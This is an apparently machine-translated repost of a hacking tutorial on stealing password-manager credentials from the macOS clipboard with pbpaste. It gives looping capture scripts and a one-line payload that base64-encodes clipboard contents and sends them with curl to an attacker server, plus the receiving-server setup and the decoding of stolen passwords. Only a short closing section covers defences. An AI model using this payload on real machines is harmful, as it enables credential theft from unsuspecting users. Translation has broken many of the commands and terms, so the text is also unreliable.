قالب وردپرس درنا توس
Home / Tips and Tricks / Saving 1Password, KeePassX, and LastPass Passwords in Plain Text «Null Byte :: WonderHowTo

Saving 1Password, KeePassX, and LastPass Passwords in Plain Text «Null Byte :: WonderHowTo



KeePassX, 1Password, and LastPass are effective against keyloggers, phishing, and database violations. However, password managers rely on the operating system clipboard to safely move credentials from the password store to the Web browser. Within a few seconds, an attacker can save the contents of the clipboard and filter out passwords.

There are two scenarios for an attack on the clipboard that is targeted to Password Manager. Both use the command pbpaste from all versions of macOS. Pbpaste takes all the data found on the clipboard (including passwords) and writes them to standard output. Any MacOS user can do this by first copying a password to the clipboard and then immediately typing pbpaste into a terminal.

There are no special permissions required to run pbpaste. The clipboard can be written to any file as shown below.

  ~ $ pbpaste >> / tmp / clipboard.txt 

Option 1: Back Up the Clipboard Locally

Scenario: The attacker has set up a persistent backdoor and wants to collect passwords that pass over one longer periods of time in KeePassX, 1Password or LastPass. MacOS has improved keylogger protection, and anyone who tracks the desktop live could no longer show or hide the credentials stored in the password managers.

The attacker could copy the clipboard to a local file and occasionally search for new passwords. An infinite while loop with a delay of five seconds should suffice.

  ~ $ while true; Type -e " n $ (pbpaste)" >> / tmp / clipboard.txt && sleep 5; done 

The while loop executes pbpaste and pause (sleep) for five seconds. The command in the loop is repeated over and over, repeatedly outputting everything in the clipboard. A echo was introduced to create a new line ( n ) with each entry to prevent data from being concatenated on the same line.

Use or tail in an additional Netcat shell to view the contents of the clipboard.txt file.

  ~ $ tail -f /tmp/clipboard.txt[19659010[TailWhats( -f ]) Changes to the file and immediate printing of the new content found on the Clipboard. 

Prevent the clipboard.txt file from being flooded with duplicate lines by evaluating the contents of the clipboard and comparing it to the last entry in the file.

  ~ $ true as long as; do if [[ "$(pbpaste)" != "$(tail -n1 /tmp/clipboard.txt)" ]]; then echo -e " n $ (pbpaste)" >> / tmp / clipboard.txt; Only if the current contents of the clipboard does not match the last entry ( tail -n1 ) in the clipboard.txt (! = ), will the pbpaste update the file. 

This solution is somewhat flawed. The statement if compares only the last line of the clipboard.txt file. So, if there are several lines in the clipboard, it will not be recognized as a duplicate entry. But it serves its purpose for this article and most scenarios. You can spend a little time building a robust, proper solution.

Option 2: Transferring Passwords to a Remote Server

Scenario: The attacker did not want to access the MacBook remotely. Instead, the payload is used to periodically transfer the clipboard to the attacker's server.

In this scenario, the attacker only cares about the exfiltration of the clipboard and has not protected the MacBook with backdoors. Instead, they found a way to run code remote on the target MacOS device. Setting up this attack involves a PHP server controlled by the attacker used to intercept exfiltrated data. My example uses a Debian virtual private server.

Step 1: Install PHP

To begin, install php with the following apt-get command executed in Debian and Kali Linux.

  ~ # apt-get update && apt-get install php

Ign: 1 http://http.us.debian.org/debian stretch InRelease
Hit: 2 http://http.us.debian.org/debian stretch-updates InRelease
Hits: 3 http://security.debian.org/debian-security stretch / updates InRelease
Hit: 4 http://http.us.debian.org/debian stretch release
Read package lists ... Done
Read package lists ... Done
Create dependency tree
Status information is read ... Done
The following NEW packages will be installed:
apache2-bin libapache2-mod-php7.0 libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap liblua5.2-0 php
php7.0 php7.0-cli php7.0-common php7.0-json php7.0-opcache php7.0-readline psmisc
0 updated, 16 reinstalled, 0 removed and 0 not updated.
Requires 5,209 kB of archives.
After this process, 19.9 MB of additional space is used.
Would you like to continue? [Y/n] 

Create a directory named "phpServer /" with the following command: mkdir .

  ~ # mkdir phpServer / 

Change to the phpServer / directory with the command cd command.

  ~ # cd phpServer / 

Create a file named "index.php" with nano .

  ~ / phpServer # nano index.php 

Paste the following PHP code into the nano-terminal. Once this is done, press to save and exit the Nano Terminal Ctrl + x then y and then Enter .

   

This simple PHP server can intercept data and does not need to be altered in any way to work. When the MacBook sends the contents of the clipboard, the server captures the data and attaches it to a file named clipboard.txt.

Finally, start the PHP server with php -S 0.0.0.0:80 command.

  ~ / phpServer # php -S 0.0.0.0:80

PHP 7.0.33-0 + deb9u3 Development Server was launched on June 9 at 08:38:55 in 2019
Listen to http://0.0.0.0:80
The document root is / root / phpServer
Press Ctrl-C to exit. 

Step 2: Create the payload.

The following script compares the current contents of the clipboard with the content last sent to the attacker's server. For the sake of clarity, it is in the standard shell script format to make room for comments.
while true; do

# An if statement compares the current clipboard
# content to the content of the last loop.
if [[ "$(pbpaste)" != "$pbpaste_last" ]]; then

# A `p` to save the contents of the encoded clipboard. The
# Content must be encoded before sending
# the server of the attacker, to prevent him from
# Run a roll-in command.
p = "$ (echo $ (pbpaste) | base64)"

# Curl takes the encoded string and delivers it
# the server of the attacker via POST request.
curl --data "$ p" -X POST & # 39; http: //attacker.com/'

# The variable `pbpaste_last` is updated. This variable
# is evaluated in the following loop.
pbpaste_last = "$ (pbpaste)"

Wait for 5 seconds before checking the clipboard
# for new content. Decreasing this value leads to
# the script to evaluate the clipboard more often,
# will have a negative impact on the MacBook
# CENTRALIZED PROCESSOR. Increasing the value can cause the script
# I forgot a valuable password. Adjust as needed.
Sleep 5
fi
done

Compress the script in one line to fit easily into different stager types.

  while true; do if [[ "$(pbpaste)" != "$pbpaste_last" ]]; then p = "$ (echo $ (pbpaste) | base64)"; curl - data "$ p" -X POST "http://attacker.com/" && pbpaste_last = "$ (pbpaste)"; Sleep 5; fi; done 

Step 3: Examining the exfiltrated data

When the PHP server receives data from the clipboard, it displays the origin of the data (IP address) and the date and time. Press Ctrl + c to stop the PHP server.

  PHP 7.0.33-0 + deb9u3 Development Server was launched on June 9 at 08:38:55 in 2019
Listen to http://0.0.0.0:80
The document root is / root / phpServer
Press Ctrl-C to exit.
[Sun Jun  9 09:03:23 2019] 23.129.64.153:63761 [200]: /
[Sun Jun  9 09:03:33 2019] 23.129.64.153:46089 [200]: /
[Sun Jun  9 09:03:50 2019] 23.129.64.184:13728 [200]: /
[Sun Jun  9 09:03:56 2019] 199.195.250.77:38894 [200]: /
[Sun Jun  9 09:04:02 2019] 199.195.250.77:40646 [200]: /
[Sun Jun  9 09:04:10 2019] 209.141.58.114:45602 [200]: / 

View the contents of the clipboard.txt file with cat to find the encrypted passwords. KeePassX and 1Password automatically clear the clipboard after 10 or 30 seconds respectively. LastPass indicates that the clipboard will be deleted "after a given period of time". Blank shipments from the MacBook are displayed as "Cg ==" encoded.

  ~ / phpServer # cat clipboard.txt

WVQ0bjNNNHNDcGpwc1RWN0xrWm9LCg ==
Cg ==
dGhpcyBpcyBteSBwYXNzd29yZAo =
UHdVN1YzWzg3a3ZUPyNed01QKF9jVHltNj8iPjoifTp7Kl5gYH4K
WVQ0bjNNNHNDcGpwc1RWN0xrWm9LCg ==
Cg ==
WVQ0bjNNNHNDcGpwc1RWN0xrWm9LCg == 

The following command automatically decodes all base64 strings in the clipboard.txt file. All following strings are passwords collected with KeePassX, 1Password, and LastPass.

  ~ / phpServer # cat clipboard.txt | while read -r password; do base64 -d << < "$password"; done

YT4n3M4sCpjpsTV7LkZoK

this is my password
PwU7V3[87kvT?#^wMP(_cTym6?">: "}: {* ^` `~
YT4n3M4sCpjpsTV7LkZoK

YT4n3M4sCpjpsTV7LkZoK 

Living outside the country (Conclusion)

Penetration testers are encouraged to use as many resources as they already have in the vulnerable operating system (ie, " life outside the country"). Like cURL, Netcat, Bash and LibreSSL, pbpaste is another integrated tool that can easily be misused by hackers after exploit deployments.

An attacker searches all the ways to find the login passwords of a target. With Pbpaste, it's almost too easy to back up credentials stored in password managers.

How to Protect Yourself from Clipboard Storage

To prevent an attacker from saving your clipboard, install the official 1Password Browser Extension or the LastPass Browser Extension , They are available for all modern web browsers. KeePassX users have similar browser extensions, but none have been officially tested or tested.

Enable the 1Password Extension Helper for 1Password after installing the extension when prompted. Then, the helper would allow 1Password to automatically fill in logon credentials when logging in to websites. Auto-fill does not use the clipboard at all, preventing it from being clipped to the clipboard. The process is similar for the LastPass extension.

Note that both do not work 100% of the time. Sometimes it is necessary to copy passwords to the clipboard if auto-completion on a website does not work.

If you need to copy a password, you can customize the clipboard settings for the password manager. For example, you can open 1Password's settings, select "Security," and then enter a time in seconds by selecting "Delete Clipboard After". Make it as short as possible. In the above hacks, we used five-second intervals, so three or four seconds could be useful. However, this does not mean that a hacker can not retrieve a password if he checks the clipboard at the right moment or the time interval is shortened.

Overall, there is no built-in ability to delete the clipboard on macOS after a specified time or after inserting an element. This is also not recommended because the clipboard is used for purposes other than just passwords.

You can create a clipboard deletion service and assign it a shortcut such as command + arrow down . You can then manually delete the clipboard after inserting a password so that it does not stay longer than necessary. Just create the service with Automator, but use the following "Run shell script". However, they would encounter the same problem described above because the clipboard was filtered out at the right time or at a shorter interval before the checks.

  pbcopy </ dev / null 

If you liked this article, follow me on Twitter @tokyoneon_ . If you have questions or concerns, leave a comment or message on Twitter.

Do Not Miss: Creating a Fake PDF Trojan with AppleScript

Cover photo and screenshots of tokyoneon / Null Byte




Source link